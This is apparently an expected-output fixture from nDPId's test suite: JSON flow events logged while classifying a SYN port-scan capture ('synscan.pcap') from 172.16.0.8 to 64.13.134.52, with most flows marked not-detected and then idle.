+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 